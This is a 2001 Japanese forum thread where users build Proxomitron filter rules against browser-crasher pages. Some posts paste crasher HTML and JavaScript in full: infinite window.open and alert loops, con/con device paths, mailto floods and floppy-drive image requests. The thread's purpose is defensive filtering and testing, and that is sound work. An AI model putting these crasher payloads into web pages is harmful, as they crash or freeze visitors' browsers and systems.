1 :
名無しさん@お腹いっぱい。 :
2001/08/20(月) 11:28 ID:dbxWS/6c
2 :
1 :2001/08/20(月) 11:35 ID:dbxWS/6c
Windows版に立てるべきだったかな? Onload UnloaderとProtocol Src Killerで大体は防げた。
3 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 11:43 ID:wskWno0c
4 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 12:22 ID:dbxWS/6c
>>3 Proxomitronを使ってわざとブラクラを踏むスレ。
5 :
3 :2001/08/20(月) 12:54 ID:X9415Eoc
自分でもアプレットやスクリプトの開発してるから Proxomitronで無差別フィルタはやっぱり使いづらい やっぱりセキュリティゾーン登録を強化したいな サーバ別じゃなくてサイト別に
6 :
3 :2001/08/20(月) 12:56 ID:X9415Eoc
プロキシのフィルタ作りも面白いけどね
mailtoとFDDとconconのサンプル
HTMLベタで書いてあるから、JavaScript止めた位じゃ防げない
右クリJavaScriptからでなくても、オフラインでチェックできるんだけど(
http://www.coara.or.jp/~tkuri/PBCC/ )
ま、ブラクラチェック書ける奴は、テストでブラクラも書けないと(藁
あくまでもテスト用(藁藁
そのうちこのスレもブラクラギャラリーになったりして(爆
みんなもチャレンジしてみそ
9 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 13:31 ID:dbxWS/6c
Protocol src killer の改造が必要デシタ。 どっかの行に file:| と入れると幸せになります。
11 :
名無しさん@お腹いっぱい。 :2001/08/20(月) 13:46 ID:n2pqhFZ2
モーホー発見
楽しいActiveペケ 愉快なJAVAアプ
うへ、戻って来て見たら全然増えてねえや どうやら分かってない夏休み厨房は一匹だけか 程度低いな(藁
14 :
名無しさん@お腹いっぱい。 :2001/08/21(火) 00:02 ID:f92H0ECk
JavaScriptの無限ループは防げない? やっぱりJavaScriptを切るしか無いのか。
>JavaScriptを切る てゆーか、 未知のサーバ=インターネット・ゾーンのレベルで、 ActiveX、JavaScript、JAVAアプレットの有効/無効を、 ダイアログ確認にしといたら?すげーウザいけどね。
16 :
Bluck :2001/08/21(火) 13:50 ID:mQi8LaBk
まえ、それやってみたけどほんとにウザいよ。 完全に表示されるまで何回もダイアログボックス閉じないといけない。
>>16 そりゃ本当に怪しいHPだ!
制限付きゾーンに放り込んで何もさせちゃいかん!
と思うが、まあ、そこは自己責任で。
>>1 Win板は厨房ばっかで漏れも全然逝かないから、ここでいいよ。
19 :
Bluck :2001/08/21(火) 21:36 ID:mQi8LaBk
>>17 なんかの公式ページとかでもいろいろごちゃごちゃしてるのあるよ。
怪しいところとは限らない。
>>19 それでもウザくて表示とかに支障なけりゃ制限付きゾーン逝き。
まともそうな(?)メーカーとかベンダで、文句ねじ込めそうな所なら、信頼済みに入れる。
ちなみにウチの信頼済みサーバ37件に対して、制限付きサーバは434件(笑)。
CSV作ってレジストリにまとめて放り込む。
スクリプトをダイアログ表示にしてるとかなり大変。
23 :
___ :2001/08/22(水) 09:04 ID:PQjZXKpk
JavaScript といっても危険なのは無限ループくらいだから、俺は自作フィルタで防いでる。 あとはQ2サイトでよく使われる onload、onunload、onbeforeunload あたりをつぶせばOK。 実際ブラクラは必ずクリックして確かめているけど、防げなかったのは一つも無かった。
24 :
actkyo002059.adsl.ppp.infoweb.ne.jp :2001/08/22(水) 17:36 ID:Sjh4otqw
ちょっとプロキシテスト。
>>21 ブラクラチェッカーでは引っかからなかったYO!
>>21 うーん、確かにブラクラチェッカーでは引っかからないけど、
ソース覗くとJavaScriptべったり。
誰か踏んでみてちょうだい。
もう一回プロキシテストします。スマソ
Proxomitronでonload・onunloadとfileプロトコルへのアクセスは防げている模様。
無限ループのフィルタきぼーん。
>>23
28 :
:2001/08/24(金) 00:58 ID:???
>>28 ブラクラ。いや、そういうスレだけど。
無限ループのフィルタがないのでキツイです。
Bounds = "<script*</script>" Limit = 1024 Match = "*(for|while)*" "&(*window.(open|scroll))" とりあえず、こんなの使ってるよ。 関係ないのもいっぱいひっかかるが、 まぁ実害無い。
31 :
山師さん :2001/08/24(金) 09:47 ID:???
age
>>21 はリンク先がなかった・・・
>>28 は途中でOSに落ちるかと聞かれた。
Win98+IE5.01+SP2+暗号強度128BIT
とりあえず
http://kuma1.virtualave.net/howto/kiken/d/118.jpg 対策になるかな?
while対策
Name = "Kill While-Loop JavaScript"
Active = TRUE
Bounds = "(while) \([^\(\)]++\)*}"
Limit = 1024
Match = "((while) \([^><=\&\|\!\(\)]++\))\1 ({|) \2 }"
Replace = "{document.write("While-Loop Javascript found!");}"
for対策
Name = "Kill For-Loop JavaScript"
Active = TRUE
Limit = 1024
Match = "(for \([^;]++;[^><=\&\|\!;]++;[^\)]++\))\1 ({|) \2 }"
Replace = "{document.write("For-Loop Javascript found!");}"
refresh対策(Anti-Auto-Refresher改造版)
Name = "Anti-Auto-Refresher2"
Active = TRUE
URL = "^*.(jpg|jpeg|gif|png|bmp)"
Bounds = "<meta\s*>"
Limit = 256
Match = "*http-equiv=("|)refresh*content = ("|) ([0-9]++)\2 ((; url=("|)([^"'> ]++)\1)|) " *"
Replace = "\2seconds-refresh to <a href="\1">\1</a> killed!"
>>33 > refresh対策(Anti-Auto-Refresher改造版)
それだと http-equiv 属性と content 属性を逆にされたらフィルタリングできなくなるよ。
(これは細かいけど) 属性値を 0.1 とかにされても効かなくなるよ。
>>28 は、Image Checkerで防げますよ。
36 :
33 :2001/08/24(金) 20:57 ID:???
逆は気付いてた。一昨日それでエロサイトでrefresh食らったばかりから。 でも小数は盲点だったなあ…。
37 :
34 :2001/08/24(金) 23:47 ID:???
他にも
<meta http-equiv="refresh" content="1;; url=
http://www.google.co.jp/ ">
<meta http-equiv="refresh" content="1; url=
http://www.google.co.jp/ ">
…とか。2 番目の方法は実際に自分のサイトで使ってます。
Anti-Auto-Refresher が効かないように (笑
間にスペースなどの適当な文字をたくさん入れられ、
フィルタの Byte Limit を消費されてもだめです。これは
どんなに完璧に作ったとしても防げませんよね。
単なる meta refresh を防ぐフィルタでも作り込もうとすると
相当難しくなるので、ブラクラを防ぐフィルタとなると…。
余程隙を突かれない限り食らうことのないブラクラのために
どこまで通常のブラウジングを犠牲にするか。自分なりの妥協点を
見つけるのも大事だと思う。
最後に 33 さん、気分害されたなら本当にごめんなさい。
38 :
ふ :2001/08/25(土) 23:24 ID:???
ブラクラで無限JavaScriptにやられると、 Win9*系だとOSまで落ちますよね? 2000だと落ちないんでしょうか? ちなみに、 Macだとループをストップさせられるし、 ストップさせなくても、 そのうち終わって(多分、割り当てメモリ使いきるまで) ブラウザだけ強制終了させればすんじゃいます。
39 :
38 :2001/08/25(土) 23:29 ID:???
言い忘れたけど、
>>37 は、OS9の話です。
OS×は使ったことないからわかんないや。
それと、
たまには、ブラクラ踏んで、
次から次に開く画面を見たいので、
激速なブラクラがあるところを教えてください。
ブックマークしておきます。
COSMO-GATEの認証先がブラクラ、これだとブラクラチェッカーがつかえないから恐いな… ちなみに、COSMO-GATEはIDとパスワードによってリンク先のアドレスが分からないようにしてアクセスするCGIです。
無限ループに引っかかったけど、Ctrl+Alt+Delで一時停止できるので、その状態から強制終了。 Proxomitronで対抗していない。((藁
42 :
38 :2001/08/25(土) 23:43 ID:8FoAYjxA
>>40 タン
どこですか?
久しぶりにブラウザの花を咲かせてみたい!
>>41 タン
えっ、98でCtrl+Alt+Del で止められなかったけど。
その前にフリーズしただけだったのかな。
43 :
プロクセ :2001/08/27(月) 01:23 ID:???
Proxomitronで閲覧したサイトをオフライン状態で履歴から見る時って、 やっぱjavascriptとかはまだ生きてるの? それともproxomitronで処理したのが保存されてるのかな?
>>43 JavaScriptは殺しているかと。
駄目ならローカルにもフィルタをかければなお良い。
>>43 当たり前だけど、
ブラウザで一回表示したキャッシュはその時表示した状態(頃したなら氏んでる)状態
直にhtmlを↓した場合はうpしてあるソースそのまま。
折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど
そーするとキャッシュをオフラインで見た時JS関係は生きてる。
mailtoとかは全部氏んでる。
#ブラクラ踏んだ時ソース見たりしない?それで見れる氏んでるhtml
#自体は既にローカルに落ちてたモノを見てるんだから、当然と言えば当然。
46 :
名無しさん@お腹いっぱい。 :01/09/07 20:18 ID:URHwhxS2
age
>折れJSとActiveXはブラウザでオフにしてるからおみとろんでは何も掛けてないんだけど >そーするとキャッシュをオフラインで見た時JS関係は生きてる。 これだとローカルで見たときにブラクラ食らうよね。
>>48 404 Not Found と出るんですが・・・
>>48 <HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<TITLE>JAVA COM</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#0000FF" VLINK="#9276FF" ALINK="#FF0000">
<img width="1" height="1" src="file://c|/con/con/con">
<script language="JavaScript">
<!--
i = 0;
while (i < 99) {
window.open("res://ie4tour.dll/welcome.htm");
window.open('mailto:
[email protected] ');
window.open('facecrash.htm');
i++;
}
// -->
</script>
<noscript>
<CENTER>
<font style="font-size:999pt"><a href="iecrash.html">ENTER</a></font>
</noscript>
</CENTER>
</BODY>
</HTML>
52 :
Kramer :01/09/11 19:56 ID:c7OgpYyM
>>48 とりあえず、影響はなかったな。
JavaScriptも無効にしてるし。
53 :
名無しさん@お腹いっぱい。 :01/09/14 17:46 ID:oBD5bPO6
良スレage
54 :
名無しさん@お腹いっぱい。 :01/09/21 22:33 ID:cTWjc3wc
55 :
名無しさん@お腹いっぱい。 :01/09/22 03:07 ID:POIVTt7g
完全に撃墜成功
>>54 refreshタグブロック
無限Javascriptブロック
mailtoブロック
ローカルディスクへのリンクブロック
結果だけ報告されても(´Д`;)
57 :
名無しさん@お腹いっぱい。 :01/09/22 13:45 ID:Yyuz/i4M
>>54 Alertウインドウ出まくったんで強制終了させました。
これを防ぎたいのですが、どんなフィルタを書けばいいんですか?
<SCRIPT LANGUAGE="JavaScript">
for ( ; ; ) {
window.alert("--------------------------------")
}
</SCRIPT>
これだと思うんですけど・・・。
58 :
名無しさん@お腹いっぱい。 :01/09/22 14:08 ID:POIVTt7g
59 :
名無しさん@お腹いっぱい。 :01/09/22 14:10 ID:oNxCBvU6
>>54 のところへ行ったけど何にもならんかった。
どうやら防げているようだが良く分からない。
60 :
名無しさん@お腹いっぱい。 :01/09/22 14:16 ID:VxFnzQO2
すまん。スレ違いだろうけど、誰か2chに書き込んだ後の スレッドの文字化けとスレッド一覧の文字化けを防ぐ フィルタ持ってないでしょうか?
>>60 ここはブラクラ対策がメインだから、Win板で聞いた方が適切だと思いま
すが、Part4スレのP3-417さん作のフィルターです。一部弄っているので、オ
リジナルとは、異なります。[HTTP hearders]のフィルターです。
In = FALSE
Out = TRUE
Key = "URL: 2ch Jump htm to html (Out)"
Match = "(
http:// ([^.]++{2,9}.2ch.net|www(2|).bbspink.com)/[^/]++{2,20}/(index(|2)|subback).htm)\1((^?)|l.gz)"
Replace = "$JUMP(\1l)"
>>54 のサイト嵐と荒しを掛けてるんだね。で、dbug使ってどのフィルターが
効いているのか、見てみたんで、書いときます。
Major Sites Ad Killer (2001/09/20)、AD Killer 1.4、Kill the worst Pop
-Up windows、Kill For-Loop JavaScript、Trinity's Protocol Killer、
Local File Access Killer、Protocol src killer (2001/07/24)
64 :
名無しさん@お腹いっぱい。 :01/09/22 18:57 ID:BZVj1W2s
あれ、
>>54 のFDアタックが防げなかった。
srcは殺してるはずなんですけど?
ソース貼って頂けないでしょうか。
>>54 の先にあるブラクラ本体の方のです。
IE6+セキュリティ高(カスタマイズ)+Protocol Src Killer+Local File Access Killer+Anti-Auto-Refresher+無限ループ対策でもブラクラに引っかかった。 が、IEが落ちただけで何の影響もなかったけど、7どうよ?
66 :
名無しさん@お腹いっぱい。 :01/09/23 02:36 ID:NtgZ5.1Y
>>64 関係部分のみです。
<SCRIPT LANGUAGE="JavaScript">
<!--
for (i=0; i<100; ++i) {
window.open();
}
-->
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
for ( ; ; ) {
window.alert("--------------------------------")
}
</SCRIPT>
<IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con"><IMG SRC="file:///c|/con/con">
<IMG SRC="mailto:1"><IMG SRC="mailto:2"><IMG SRC="mailto:3">
<IMG SRC="mailto:4"><IMG SRC="mailto:5"><IMG SRC="mailto:6">
<IMG SRC="mailto:7"><IMG SRC="mailto:8"><IMG SRC="mailto:9">
<IMG SRC="mailto:10"><IMG SRC="mailto:11"><IMG SRC="mailto:12">
<IMG SRC="mailto:13"><IMG SRC="mailto:14"><IMG SRC="mailto:15">
<IMG SRC="mailto:16"><IMG SRC="mailto:17"><IMG SRC="mailto:18">
<IMG SRC="mailto:19"><IMG SRC="mailto:20"><IMG SRC="mailto:21">
<IMG SRC="mailto:22"><IMG SRC="mailto:23"><IMG SRC="mailto:24">
<IMG SRC="mailto:25"><IMG SRC="mailto:26"><IMG SRC="mailto:27">
<IMG SRC="mailto:28"><IMG SRC="mailto:29"><IMG SRC="mailto:30">
<IMG SRC="mailto:31"><IMG SRC="mailto:32"><IMG SRC="mailto:33">
<IMG SRC="mailto:34"><IMG SRC="mailto:35"><IMG SRC="mailto:36">
<IMG SRC="a:\1.jpg"><IMG SRC="a:\2.jpg"><IMG SRC="a:\3.jpg">
<IMG SRC="a:\4.jpg"><IMG SRC="a:\5.jpg"><IMG SRC="a:\6.jpg">
<IMG SRC="a:\7.jpg"><IMG SRC="a:\8.jpg"><IMG SRC="a:\9.jpg">
<//--><//"--> </BODY>
67 :
64 :01/09/23 03:51 ID:lVQY8WzM
ありがとうございます。
>>66 conconに引っ掛かるわけはないんで、
<IMG SRC="a:\1.jpg">の部分で、自分はやられたんだと思います。
Protocol Src Killer+Local File Access Killerでこの部分は防げないのでしょうか?
68 :
67 :01/09/23 04:28 ID:lVQY8WzM
>>66 とりあえず、自分でProtocol Src Killerにa:\を追加しました。
どうもでした。
オイラ単純に <IMG SRC*a:*> をターゲットにしてるけどそれじゃダメなんかなぁ? だってローカルのAドライブにアクセスする必要ないし。
>>67 Trinity's Protocol Killerで防げますよ。
71 :
名無しさん@お腹いっぱい。 :01/09/23 13:37 ID:nud4pauY
とりあえずローカルへのアクセス全滅(多分)フィルタ Name = "Local href_src killer" Active = TRUE Bounds = "<*>" Limit = 256 Match = "<[^>]++(href|src)=("|)((file|[a-z]):[^ >"']+)\1 * >" Replace = "<font size=1>[localfile \1]</font></a>"
72 :
名無しさん@お腹いっぱい。 :01/09/23 21:01 ID:n7rv3pfA
>>71 様
ありがとうございました。
Protocol Src Killerにaからzまで追加する手間が省けました。
今、ふと思ったんですが、<IMG SRC="a:\〜">で、"a"のところが"g"
などになっていて、そこに仮想ドライブを割り当てていた場合、マシンは
どういう反応をするんでしょうか。
愚問でした。
74 :
名無しさん@お腹いっぱい。 :01/09/23 23:20 ID:PQGYVymU
ネットスケープだと<IMG SRC="a:\1.jpg">ではやられないね。
>>1 R焼き&WinMX使用中に踏んでしまった。鬱。
…でも、ネスケ&Win2000&P3/1GHz&RAM512MBのおかげで助かった。
IEだったらたぶん焼きミスってる。
76 :
75 :01/09/23 23:47 ID:???
とりあえずProxomitronを入れてみる事にした。
そんな自分はまさに
>>1 の思惑通り?
77 :
1 :01/09/24 00:24 ID:ZF31Fpjs
>>76 / ̄ ̄ ̄ ̄ ̄ ミ
/ ,――――-ミ
/ / / \ |
| / ,(・) (・) |
(6 つ |
| ___ | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| /__/ / < 困惑通り。なわけねえだろ!
/| /\ \__________
>>76 ,
>>77 どっかで見たことそのまま書いとく。
初心者IE
知ったか中級者ネスケ
上級者IE+オミトロン(+タブブラウザ)
>>78 漏れはIE+Proxomitron。
タブブラウザは発想は面白いが、IEの使い勝手がないから使ってない。
そういう意味ではfubはけっこういいかと。
<html> <head> <title>Beyond The Net</title> </head> <body> <p><img src="JavaScript:resizeTo( 100, 100 );setInterval( 'moveTo( Math.random() * screen.width, Math.random() * screen.height )', 50 );"></p> </body> </html>
81 :
名無しさん@お腹いっぱい。 :01/09/26 23:11 ID:cSR9M.Js
Name = "BrowserCrasher FUCK" Active = TRUE Bounds = "<*>" Limit = 2048 Match = "<*file://*>|<*?\\*>|<*mailto:**>|" Replace = "<!-- BrowserCrasher -->" 始めて作ったやつなんだが、 かなり誤爆しそう(鬱
82 :
81 :01/09/27 00:09 ID:???
ってできてないし 逝ってこよう
Mozilla+おみとろん ですが何か?
これってオミトロンって読むんだ。知らんかった・・・。
85 :
名無しさん@お腹いっぱい。 :01/09/30 00:39 ID:zsg8k9ec
Java Scriptの無限ループ対策フィルタを!
86 :
名無しさん@お腹いっぱい。 :01/09/30 01:45 ID:G3TwicaI
87 :
名無しさん@お腹いっぱい。 :01/09/30 01:47 ID:G3TwicaI
Bounds = "<script*</script>"
Limit = 1024
Match = "*(for|while)*"
"&(*window.(open|scroll|alert))"
こうやって、
>>54 に対策したいのですが、
問題ありますか?
90 :
名無しさん@お腹いっぱい。 :01/09/30 02:18 ID:G3TwicaI
>>30 は置き換えがしてないので未完成かな?
>>33 は個別に対応している。
どっちがいいとも・・・
分からないのなら
>>33 にしとけば?
俺もMatchの文法は良く分からん。
詳しい方、解説お願いします。
92 :
名無しさん@お腹いっぱい。 :01/09/30 02:47 ID:zsg8k9ec
>>71 入れてるんだけど、
>>91 でゴーーーーっとa:がアクセスされる。
なんで?
93 :
ソース(一部"削除") :01/09/30 02:58 ID:G3TwicaI
94 :
名無しさん@お腹いっぱい。 :01/09/30 03:36 ID:tBPFRFK6
何でだろう??? テストではきっちり殺せるのに??? スキルの有る方、どうかご教授願えないでしょうか。
95 :
名無しさん@お腹いっぱい。 :01/09/30 03:38 ID:tBPFRFK6
Protocol Src Killer+
>>71 で殺せるはずなんですが???
不思議だ???
ちゃんとjpgにもフィルタ効くようにしてるのか?
97 :
名無しさん@お腹いっぱい。 :01/09/30 04:19 ID:whGjce7E
どういうことでしょうか? URLのjpgと関係があるのでしょうか? <img src="file://a:a.jpg"> のjpgは、src”file:で殺してるんですけど? 全然私、分かってないのかも・・・
99 :
名無しさん@お腹いっぱい。 :01/09/30 10:22 ID:a5Bb.yHo
100 :
名無しさん@お腹いっぱい。 :01/09/30 12:32 ID:tsv.GZkA
>>91 ネットスケープだと無反応だ。
どうやら拡張子がjpgのは素直にJPEGファイルとして認識して、HTMLを解釈しないようだ。
101 :
名無しさん@お腹いっぱい。 :01/09/30 12:37 ID:/k3rUZ3Q
>>99 Image Checker は見つかったのですが、Filter image extension が見つかりません。
試しにImage Checker だけで飛んでみたらやっぱりダメでした。
多分ヘッダをなんとかしないとだめなんですね。
恥を忍んでお願いします。
Filter image extensionの書式をこちらに書き込んで頂けないでしょうか。
済みません。
>>101 Content-Type text/plain用のフィルター
In = TRUE
Out = FALSE
Key = "Content-Type: Filter text/plain"
Match = "text/plain"
Replace = "text/plain$FILTER(true)"
バイト制限無いタイプ
In = TRUE
Out = FALSE
Key = "URL: Filter image extension"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$FILTER(true)"
50Kバイト以下の画像用
In = TRUE
Out = FALSE
Key = "URL: Filter image extension [P] [08.04.R2.2001]"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$IHDR(Content-Length: [#0-51200]$FILTER(true))"
Image Checker After入れておかないと、画像が壊れたりしますよ。
102 いまさらNimdaかよ!
105 :
:01/09/30 14:18 ID:???
106 :
:01/09/30 14:20 ID:???
Image checkerとFilter image extension入れたけど、やられちゃうよ。 どうして?
>>107 Trinity's Protocol Killer,Protocol src killer (2001/07/24),
Local File Access Killerとか使ってますか?
>>108 Protocol src killer (2001/07/24)と
>>71 を使ってます。
110 :
名無しさん@お腹いっぱい。 :01/09/30 20:02 ID:a5Bb.yHo
以下のフィルターを入れてから
>>91 を見て、茶色の枠に囲まれたブラクラのソースが
表示されればOK。
[HTTP headers]
In = TRUE
Out = FALSE
Key = "URL: Filter image extension"
URL = "*.(jpg|jpeg|gif|png|bmp)"
Match = "$FILTER(true)"
[Patterns]
Name = "Image Checker [P] [08.07.2001]"
Active = TRUE
Bounds = "<*>"
Limit = 115
Match = "$IHDR(Content-Type: image/(jpeg|gif|png|bmp))&(*(html|head|title|body|script|img|src|href|file|style|link)*)"
Replace = "<html>\n"
"<head>\n"
"<title>HTML Content Found! : \u</title>\n"
"</head>\n"
"<body bgcolor="maroon">\n"
"<center><br>\n"
"<font color="yellow" size="5"><b>HTML Content Found!</b></font><br><br>\n"
"<font color="white" size="4">\u</font><br><br>\n"
"<iframe src="
http://bweb..src..\u " width="100%" height="100%" frameborder="0"></iframe>\n"
"</center>\n"
"</body>\n"
"</html>\n"
"\k"
Name = "Image Checker After"
Active = TRUE
Limit = 50
Match = "$IHDR(Content-Type: image/(jpeg|gif|png|bmp))&(*)\0"
Replace = "\0"
>>110 おお!できました!
最後のImage Checker Afterってのは何をしてるんですか?
>>111 >>103 に書いたが、Image Checker Afterは、画像の壊れを防止する為
のフィルター。
>>112 Afterは一生懸命反応してるけど画像が壊れちゃう。
114 :
:01/09/30 22:33 ID:???
>>115 ええ、キャッシュじゃないです。
Part4スレを参考にImage CheckerとAfterを一番上に持ってきたら壊れなくなりました。ありがと!
Afterなしでも壊れないけど、なんで?
>>117 画像壊れないのは、ラッキーだと思いますよ。それと、全部の画像が壊れ
るわけじゃないよ。全員、同じ画像が壊れるのか分からないし、環境によって壊
れる、壊れないって違いが出るのかも知れない。
ブラクラ探ししてたけど、なかなか見つからない。 死体画像とか踏んじゃって、気持悪い・・・
つーか何も直にふまんでもtestすりゃ良いだけの物も多いと思うが。
121 :
101 :01/10/01 16:05 ID:hw8QsaX.
>>103 様
>>110 様
どうもありがとうございました。
お礼が遅れて済みません。
ばっちり、回避できました!
122 :
名無しさん@お腹いっぱい。 :01/10/02 00:21 ID:6y350SSM
age
123 :
名無しさん@お腹いっぱい。 :01/10/02 10:22 ID:fP1JVSJk
124 :
あげ :01/10/06 02:37 ID:HVuVSCuk
あげ
ローカルへのアクセスを完全に排除できる「Local File Access Killer」の改造方法決定版 Name = "Local File Access Killer" Active = TRUE Bounds = "<*>" Limit = 2048 Match = "<[^>]++(file://|([a-z]|[A-Z]):(^//))*>" Replace = "<!-- local file access denied -->"
126 :
125 :01/10/06 13:05 ID:???
スマソ。 125だとCSSまでマッチしてしまうんだった。 よって忘れてちょーだい。
127 :
名無しさん@お腹いっぱい。 :01/10/06 16:03 ID:SvhYjhNE
最近2chでよく見るウザいrefresh抑制フィルタ。 Name = "Anti-Auto-Refresher by X" Active = TRUE Bounds = "<meta\s*>" Limit = 256 Match = "*http-equiv=("|)refresh*content = ("|) ([0-9.][0-9.]++)\2 (; url=("|)([^"'> ]++)\1["'> ]|) *" Replace = "\2seconds-refresh to "<a href="\1">\1</a>" killed by proxomitron<br>"
128 :
奈々氏 :01/10/06 23:08 ID:???
カコイイ
129 :
名無しさん@お腹いっぱい。 :01/10/07 00:28 ID:Mn0gmbBU
Prottocol sur killer いじってみた たぶんこれでfile mailto など大体防げると思う Name = "Protocol src killer Cust" Active = TRUE Bounds = "<[^>]++src=*>|< link [^>]++ rel=("|) stylesheet*>|(< meta ([^>]++http-equiv=$AV(refresh)&[^>]++content=) [^>]++>)" Limit = 2000 Match = "*(src|href|url)=$AV((^http(s|):)*:*)*" Replace = "<!-- Protocol src killed -->\1"
131 :
名無しさん@お腹いっぱい。 :01/10/09 22:34 ID:NClxRpJM
有害スレage
>>131 どこが有害だ。
むしろ無害にしているかと。
134 :
名無しさん@お腹いっぱい。 :01/10/11 19:36 ID:yaGRI3Sc
ああ!! なんかごちゃごちゃしてもうどれを入れれば良いのか正直わからんよ。
135 :
名無しさん@お腹いっぱい。 :01/10/11 20:19 ID:v.KkGaAY
>>132 まず、
>>129 などのProtocol src killer は必ず入れること。
問題はブラウザのjavascriptを切るか切らないかの判断、そこが難しい。
切れば多くのブラクラを回避できるが、見られないページが多くなる。
切らなければプラクラ食らうのでproxomitronでの武装が必要。
136 :
135 :01/10/11 20:20 ID:???
137 :
134 :01/10/11 20:38 ID:???
とりあえず既存のProtocol src killerと入れ替えたーよ。
テストしたいけどブラクラ踏む勇気無し(w
漏れが無いとは限らんし・・・
あ、java&java script&cookieは必要な時以外OFFです。
なのにブラクラ踏んだ事あったので鬱。
>>1 でいきなりブラクラだったのには参りました・・・
138 :
1 :01/10/11 21:24 ID:???
>>137 をいをい…
正直、ブラクラと書いておけばよかったです。
>>134 >>125 以外全部入れとけ。
別にブラクラ踏んでも何ともないよ。
心配ならHDに空のFDでも挿しとけ。
あとタイトルもきっちり見ておけ。
140 :
名無しさん@お腹いっぱい。 :01/10/11 23:46 ID:1ZzmMZk2
各フィルタの優先度はどのようにしたらいい?
1.イメージチェッカー 2.イメージチェッカーアフター あとは適当に。
>>139 デタラメに詰め込むと動作不良起こす場合もある。順番やMultiとの兼ね合いが難しい。
あと、proxomitron通過するブラクラなんて簡単に書けるぞ。
(2chで見かけるのが単純なものばかりだから助かってるだけ。)
145 :
名無しさん@お腹いっぱい。 :01/10/12 04:03 ID:lTuAv7Lo
146 :
名無しさん@お腹いっぱい。 :01/10/12 11:23 ID:lOtEusSI
つーことで、ブラクラ回避の基本はview-source:ということですな。 まあ、文字コードに置き換えてまで作る奴は相当なアレだな。
>>145 こういうのはどうしてもいたちごっこになってしまうと言う事だな
149 :
名無しさん@お腹いっぱい。 :01/10/18 20:19 ID:7KF8/NdP
ブラクラ募集あげ
150 :
名無しさん@お腹いっぱい。 :01/10/19 02:49 ID:i4vjhHD+
>149 なんか、「Proxomitoronにブラクラで対抗するスレ」になってる感じ…
>>148 ブラクラを作る側やPopUpの広告を出しまくって資金を得ようとするweb運営者にとっては
厄介なものが出てきたというふうに感じてるんだろうね。
153 :
名無しさん@お腹いっぱい。 :01/10/25 20:49 ID:JoPmTghG
>>145 いっそのことブラウザとtelnetの関連づけを切ってしまうってのはどう?
使い勝手は悪くなるけど安全だよ。
レジストリエディタで
HKEY_CLASSES_ROOT\telnet\shell\open\command
の中にある「rundll32.exe url.dll,TelnetProtocolHandler」などの
文字列をすべて削除してしまうか、\commandを「\_command」などに
リネームしてしまえばOK。
>>153 あれは例としてtelnetを出しているだけで、telnetさえ動かなければそれでいい
というものではないと思いますが。
あぼーん
156 :
名無しさん@お腹いっぱい。 :01/10/26 03:38 ID:DZwmbmrn
↑ 誤爆? でもこれヤバイんじゃねーの?
Naoko-4正式版age
役に立つスレage
160 :
名無しさん@お腹いっぱい。 :01/11/06 18:29 ID:KB6KfYKc
ブラクラ募集(゚Д゚)
for (i=1;i>=-1;i++){open()}
164 :
名無しさん@お腹いっぱい。 :01/11/07 07:21 ID:YmC8CuM7
対症療法
>>162 Name = "Empty window-open killer"
Active = TRUE
Match = "(window.open|open)\1 \( \)"
Replace = "{document.write("Illegal window-open detected. Script terminated by Proxomitron.");break;
全てのループに回数制限つけることもできるけど見れなくなるページが出てくるのが心配で。
165 :
名無しさん@お腹いっぱい。 :01/11/07 21:32 ID:j3ZsguSL
166 :
164 :01/11/08 00:27 ID:V+ezS3o6
最後が切れてた
Replace = "{document.write("Illegal window-open detected. Script terminated by Proxomitron.");break;}"
>>165 forの中の i>=-1 がね。ここまで執念深いブラクラはあんまり見ないけど。
167 :
名無しさん@お腹いっぱい。 :01/11/08 06:23 ID:VbsJfcyu
ひでー目にあった。 今後オミトロンをスルーするブラクラが増えていくとイヤだな
>>168 ま、こーゆーのはいたちごっこだしな。
地道に知恵をつけるこった。
>>167 のってどうなるの?
えへえへ、、、しか表示されないのだけど、防げたってことでいいのかな?
>>129 のやつだと
https://kitty-guys.hypermart.net:7573/ こういうのは防げないんじゃない?
ということで改良版を作ってみました。
なにげなくIP抜きとかされてたらいやなので、
ちゃんとKillしたことを表示するようにしてます。
[Patterns]
Name = "Protocol src killer (2001/11/09)"
Active = TRUE
Bounds = "<[^>]++src=*>|< link [^>]++ rel=("|) stylesheet*>|(< meta ([^>]++http-equiv=$AV(refresh)&[^>]++content=) [^>]++>)"
Limit = 2000
Match = "*(src|href|url)=($AV((^http(s|)://[^/:]++/)*:*))\1*"
Replace = "<font size=1><a title=\1 href=\1 style="color:red">"
"[Protocol src killed]</a></font>"
なんか自作ブラクラを披露する会になってる(w
>171 報告 そのフィルタ使うとヤフオクで「ログアウト」のあたりがおかしくなる。
175 :
名無し~3.EXE :01/11/09 23:29 ID:aX0x54aU
一度ageる
実はGoogle Imageでも不具合があったから修正してたんだけど、 公開し忘れてました。。これでどう? [Patterns] Name = "Protocol src killer (2001/11/09)" Active = TRUE Bounds = "<[^>]++src=*>|< link [^>]++ rel=("|) stylesheet*>|(< meta ([^>]++http-equiv=$AV(refresh)&[^>]++content=) [^>]++>)" Limit = 2000 Match = "*(src|href|url)=($AV((^http(s|)://[^/:]++/)[a-zA-Z0-9]++{1,10}:*))\1*" Replace = "<font size=1><a title=\1 href=\1 style="color:red">" "[Protocol src killed]</a></font>"
>>176 googleはバイパスの人が多いんじゃない?
>>176 Proxomitron-Jにあるやつとどう違うの?
176のほうが強力?
>>178 Prox-Jさんのところのやつは新たにブラクラに使われるプロトコルが
見つかった場合に自分で追加していかなければならないけど、
>>176 のバージョンだと
http://hoge.com:8000/とかのポートを指定した HTTPプロトコルや10文字以下のプロトコルは[Protocol src killed]という
リンクに置換されます。
このフィルタを使っても、ふつーのHTTPプロトコルでのソースの参照は
できます。
[a-zA-Z0-9]の部分はProxomitronは大文字小文字を区別しないので
[a-z0-9]で十分でしたね。
あと、[a-z0-9._]とかにしといたほうが将来的にはいいかも。
180 :
名無しさん@お腹いっぱい。 :01/11/11 13:59 ID:XP07amlD
マッチングで\1に入った物の一部を削除や置き換えする事って可能でしょうか?
